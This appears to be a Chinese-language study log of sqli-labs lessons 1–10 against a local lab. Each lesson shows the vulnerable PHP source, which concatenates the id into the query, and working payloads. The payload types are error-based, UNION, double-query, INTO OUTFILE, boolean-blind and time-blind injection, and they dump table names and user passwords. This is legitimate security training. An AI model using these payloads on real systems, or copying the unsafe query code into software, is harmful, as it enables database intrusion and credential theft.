以下內容 只是 本人 在做 sqli-lab 練習時 寫下的記錄，僅供參考。
因為本人學過一些sql注入的內容，所以大部分內容是沒有講解的，如有不清楚的地方，請自行使用搜尋引擎查詢，相信會得到所需的內容。

Less - 1 Error Based- String

（第1節：基於錯誤 – 字串）

字元型注入，也即是通過Get或者Post方式傳進去的資料被單引號或者雙引號包裹住

Test:

    http://localhost/sqli-lab/Less-1/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注： 報錯中limit前面的是 ‘2” 對比URL上的 2’，可推斷，php的sql語句中 $id 可能被 單引號 包裹

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
 } else {
    print_r(mysql_error());
}

注：id被單引號包裹；不報錯的時候，會顯示username和password這兩個位置的內容

Solution：

' or '1'='1
    http://localhost/sqli-lab/Less-1/index.php?id=1' or '1'='1

'  --+
    http://localhost/sqli-lab/Less-1/index.php?id= 1'  --+

     其它：

    http://localhost/sqli-lab/Less-1/index.php?id=0' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-1/index.php?id= ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1

    http://localhost/sqli-lab/Less-1/index.php?id=0 ' union select 1,group_concat(username),group_concat(password) from security.users --+

---

Less - 2 Error Based- Intiger

（第2課：基於錯誤 – 數字型）

Test:

    http://localhost/sqli-lab/Less-2/index.php?id=2"/

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”/ LIMIT 0,1’ at line 1
注： 報錯中limit前面的是 “/ 和URL上的一樣，可推斷，php的sql語句中 $id 可能沒有被其它符號包裹

Sourse Code：

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注：id被雙引號包裹；不報錯的時候，會顯示username和password這兩個位置的內容

Solution：

or 1=1
     http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1

or 1=1 --
    http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1 --

--+
    http://localhost/sqli-lab/Less-2/index.php?id= 1 --+

     其它：

    http://localhost/sqli-lab/Less-2/index.php?id= 0 union select 1,version(),database()

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users

    補充：

暴使用者名稱、版本號、庫名和路徑
    http://localhost/sqli-lab/Less-2/index.php?id=0  union select 1,2,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir) --+

暴所在庫的所有表名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

暴列名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

暴username和password的內容
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username,0x5e,password),3 from users --

---

Less - 3 Error Based- String (with Twist)

（第3課：基於錯誤- 字串（變形））

Test:

http://localhost/sqli-lab/Less-3/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”) LIMIT 0,1’ at line 1

http://localhost/sqli-lab/Less-3/index.php?id=1' or 1=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”) LIMIT 0,1’ at line 1
注：報錯中出現 ‘) 推斷SQL語句中 應有 (‘$id’)存在

Sourse Code：

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注：被(”) 包裹

Solution：

') or '1'=('1
     http://localhost/sqli-lab/Less-3/index.php?id=1 ') or '1'=('1

) or 1=1 --+
     http://localhost/sqli-lab/Less-3/index.php?id=1) or 1=1 --+

     其它：

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users --+

---

Less - 4 Error Based- DoubleQuotes String

（第4課：基於錯誤 - 雙引號 字串）

Test:

    http://localhost/sqli-lab/Less-4/index.php?id=2"/

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") LIMIT 0,1' at line 1
 注： 報錯中limit前面的是 ") 對比URL上的 2"/，可推斷，php的sql語句中 $id 是被 雙引號和一層括號 包裹

Sourse Code：

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo "<font size='5' color= '#99FF00'>";
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}else{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>"; 
}

注：加了一層雙引號和括號

Solution：

")or ("1")=("1
    http://localhost/sqli-lab/Less-4/index.php?id=1")or ("1")=("1

")or 1=1 --+
    http://localhost/sqli-lab/Less-4/index.php?id=1")or 1=1 --+

     其它：

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(username),group_concat(password) from security.users --+

---

Less - 5 Double Query- Single Quotes- String

（第5課：雙注入 - 單引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-5/index.php?id=2"/

注：未報錯，只顯示 You are in………..

    http://localhost/sqli-lab/Less-5/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”’ – ’ LIMIT 0,1’ at line 1
注：能正常報錯，考慮使用報錯來獲取資訊，同時 limit前為 “’–’ 可以推斷 $id是用單引號包裹的

雙注入查詢需要四個函式/語句
1. Rand() //隨機函式
2. Floor() //取整函式
3. Count() //彙總函式
4. Group by clause //分組語句
雙注入的原理，簡單一句話原理就是有研究人員發現，當在一個聚合函式，比如count函式後面如果使用分組語句（group by）就會把查詢的一部分以錯誤的形式顯示出來“通過floor報錯的方法來爆資料的本質是group by語句的報錯。group by語句報錯的原因是floor(random(0)*2)的不確定性，即可能為0也可能為1（group by key的原理是迴圈讀取資料的每一行，將結果儲存於臨時表中。讀取每一行的key時，如果key存在於臨時表中，則不在臨時表中則更新臨時表中的資料；如果該key不存在於臨時表中，則在臨時表中插入key所在行的資料。group by floor(random(0)*2)出錯的原因是key是個隨機數，檢測臨時表中key是否存在時計算了一下floor(random(0)*2)可能為0，如果此時臨時表只有key為1的行不存在key為0的行，那麼資料庫要將該條記錄插入臨時表，由於是隨機數，插時又要計算一下隨機值，此時floor(random(0)*2)結果可能為1，就會導致插入時衝突而報錯。即檢測時和插入時兩次計算了隨機數的值。具體原理參考：http://www.mysqlops.com/2012/05/15/mysql-sql-analyze.html）。”

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注：$id被單引號包圍，URL正確時除可能知道格式外，無法獲取其它資訊；錯誤時有正常報錯，可以考慮從報錯入手

Solution：

' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    其它：

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    版本號：：資料庫名：：使用者名稱
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    表名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    列名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    行數
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第一行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第二行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第三行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第四行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第五行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第六行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第七行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第八行的使用者名稱和密碼
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 7,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

注：如果沒有現成的注入語句，建議使用mysql逐步測試出可用的語句

---

Less - 6 Double Query- Double Quotes- String

（第6課：雙注入 - 雙引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-6/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” – ” LIMIT 0,1’ at line 1
注： 能正常報錯， limit前是 ’ – ” ，推斷 $id 是被雙引號包裹

Sourse Code：

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){   
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注：$id被雙引號包圍，URL正確時除可能知道格式外，無法獲取其它資訊；錯誤時有正常報錯，可以考慮從報錯入手

Solution：

" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

     其它：

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+


    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns wheretable_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

---

Less - 7 Dump into Outfile

（第7課：轉儲檔案）

Test:

    http://localhost/sqli-lab/Less-7/index.php?id=2

You are in…. Use outfile……
注：和之前一樣 正常時除可能的格式和提示的使用 outfile以外，無其它有效資訊

    http://localhost/sqli-lab/Less-7/index.php?id=2' --+

You have an error in your SQL syntax
注：得不到詳細的報錯

    http://localhost/sqli-lab/Less-7/index.php?id=2')) --+

注：正常，$id周圍 應是單引號和雙層括號

Sourse Code：

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in.... Use outfile......';
}else{
    echo 'You have an error in your SQL syntax'; 
}

注：$id被雙層括號和單引號包圍，URL正確時有提示 用outfile，錯誤時只知有錯誤

Solution：

2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     http://localhost/sqli-lab/Less-7/index.php?id=2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     其它：

    http://localhost/sqli-lab/Less-7/index.php?id=2')) union select username,'~~',password from users into outfile  "F:\\666.txt" --+

---

Less - 8 Blind- Boolian- Single Quotes- String

（第8課：盲注 - 基於布林值 - 單引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-8/index.php?id=2'

注：什麼都沒有顯示，加上括號也不行

    http://localhost/sqli-lab/Less-8/index.php?id=2' --+

You are in………..
注：根據前幾次的經驗，這句話說明 能查出，沒有報錯，那麼之前那個估計是錯了

    http://localhost/sqli-lab/Less-8/index.php?id=2"

You are in………..
注：沒報錯，雙引號加上或改成括號也都沒錯，看來$id是被單引號圈著了
因為除了對錯什麼都判斷不出來，所以考慮構造只需判斷對錯的語句，盲注

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 116 --+

注：正確。substr(待截斷的字串，開始位置，截斷長度)

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 115 --+

注：沒顯示，則這是錯的，對照ascii，也說明 資料庫第一個字元是 小寫的s

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
}

Solution：

2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

     其它：

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length(database())) = 8 --+

注：數庫名長度=8

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,2,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,3,1))) = 99 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,4,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,5,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,6,1))) = 105 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,7,1))) = 116 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,8,1))) = 121 --+  

注：資料庫名 security

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 101 --+

注：第一張表 表名長度=6，第一個字元是 e

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

注：第四張表是users

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+

注：users表第一行 的username 第一個字母 D

---

Less - 9 Blind- Time based- Single Quotes- String

（第9課：盲注 - 基於時間 - 單引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-9/index.php?id=2
    http://localhost/sqli-lab/Less-9/index.php?id=2'
    http://localhost/sqli-lab/Less-9/index.php?id=2"
    http://localhost/sqli-lab/Less-9/index.php?id=2')

都只顯示 You are in………..這情況八成是要盲注，僅單純的布林值是不行了
（感謝這道題在提示是基於時間的。。。）

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution：

    http://localhost/sqli-lab/Less-9/index.php?id=1'+and+if(1=1, sleep(1), null)+ --+

注：說明 and 前面是對的，會停1秒   

     其它：

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 +and+if(1=1, sleep(1), null)+ --+

---

Less - 10 Blind- Time based- Double Quotes- String

（第10課：盲注 - 基於時間 - 雙引號 - 字串）

Test:

    http://localhost/sqli-lab/Less-10/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注：這個跳得挺快的，and前面是寫錯了

     http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注：這個對了

Sourse Code：

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution：

2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+ 

     其它：

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 +and+if(1=1, sleep(1), null)+ --+